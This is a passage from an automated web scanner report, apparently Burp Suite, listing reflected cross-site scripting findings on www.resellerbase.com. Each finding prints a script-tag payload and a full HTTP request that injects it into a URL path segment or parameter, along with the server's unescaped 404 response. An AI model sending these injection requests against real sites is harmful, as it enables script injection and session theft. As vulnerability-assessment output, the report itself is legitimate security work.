<p>The requested URL /detail/31/themes/kosmos/imagesbacf4<script>alert(1)</script>6d6060b3a3f/rating/ was not found on this server.</p>
...[SNIP]...

2.2208. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 150bd<script>alert(1)</script>66c5bf9e07d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating150bd<script>alert(1)</script>66c5bf9e07d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating150bd<script>alert(1)</script>66c5bf9e07d/ was not found on this server.</p>
...[SNIP]...

2.2209. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fa603<script>alert(1)</script>19e84d74849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/?fa603<script>alert(1)</script>19e84d74849=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/?fa603<script>alert(1)</script>19e84d74849=1 was not found on this server.</p>
...[SNIP]...

2.2210. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9c5f<script>alert(1)</script>408a5dadf9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb9c5f<script>alert(1)</script>408a5dadf9/31/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb9c5f<script>alert(1)</script>408a5dadf9/31/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2211. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ed3e<script>alert(1)</script>d627f2f601b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/312ed3e<script>alert(1)</script>d627f2f601b/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/312ed3e<script>alert(1)</script>d627f2f601b/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2212. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76af<script>alert(1)</script>1e4145b72f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themese76af<script>alert(1)</script>1e4145b72f7/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themese76af<script>alert(1)</script>1e4145b72f7/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2213. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 23f83<script>alert(1)</script>883d70be13a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos23f83<script>alert(1)</script>883d70be13a/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos23f83<script>alert(1)</script>883d70be13a/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2214. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 55724<script>alert(1)</script>8017fd63531 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images55724<script>alert(1)</script>8017fd63531/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images55724<script>alert(1)</script>8017fd63531/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2215. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 785e7<script>alert(1)</script>82564b840a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating785e7<script>alert(1)</script>82564b840a0/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating785e7<script>alert(1)</script>82564b840a0/4.gif was not found on this server.</p>
...[SNIP]...

2.2216. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3f697<script>alert(1)</script>9f6ec490a10 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/4.gif3f697<script>alert(1)</script>9f6ec490a10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/4.gif3f697<script>alert(1)</script>9f6ec490a10 was not found on this server.</p>
...[SNIP]...

2.2217. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad09d<script>alert(1)</script>b2aa14ffbbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/4.gif?ad09d<script>alert(1)</script>b2aa14ffbbe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/4.gif?ad09d<script>alert(1)</script>b2aa14ffbbe=1 was not found on this server.</p>
...[SNIP]...

2.2218. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2394<script>alert(1)</script>a9cf63e36a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf2394<script>alert(1)</script>a9cf63e36a2/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf2394<script>alert(1)</script>a9cf63e36a2/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2219. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce69c<script>alert(1)</script>7cfb51f2ce0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31ce69c<script>alert(1)</script>7cfb51f2ce0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31ce69c<script>alert(1)</script>7cfb51f2ce0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2220. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ef61e<script>alert(1)</script>d76e1a4342b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesef61e<script>alert(1)</script>d76e1a4342b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesef61e<script>alert(1)</script>d76e1a4342b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2221. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ff5d<script>alert(1)</script>d51857a9426 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos1ff5d<script>alert(1)</script>d51857a9426/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos1ff5d<script>alert(1)</script>d51857a9426/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2222. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload feb69<script>alert(1)</script>0e19d8d9660 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/imagesfeb69<script>alert(1)</script>0e19d8d9660/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/imagesfeb69<script>alert(1)</script>0e19d8d9660/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2223. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b3853<script>alert(1)</script>9ede5493c6b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/ratingb3853<script>alert(1)</script>9ede5493c6b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/ratingb3853<script>alert(1)</script>9ede5493c6b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2224. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 28254<script>alert(1)</script>45d51176315 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/search.php28254<script>alert(1)</script>45d51176315?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php28254<script>alert(1)</script>45d51176315?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2225. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5a35b<a>cf27b782e83 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search5a35b<a>cf27b782e83&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search5a35b<a>cf27b782e83&opt=2 was not found on this server.</p>
...[SNIP]...

2.2226. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bc061<a>0e47c119038 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

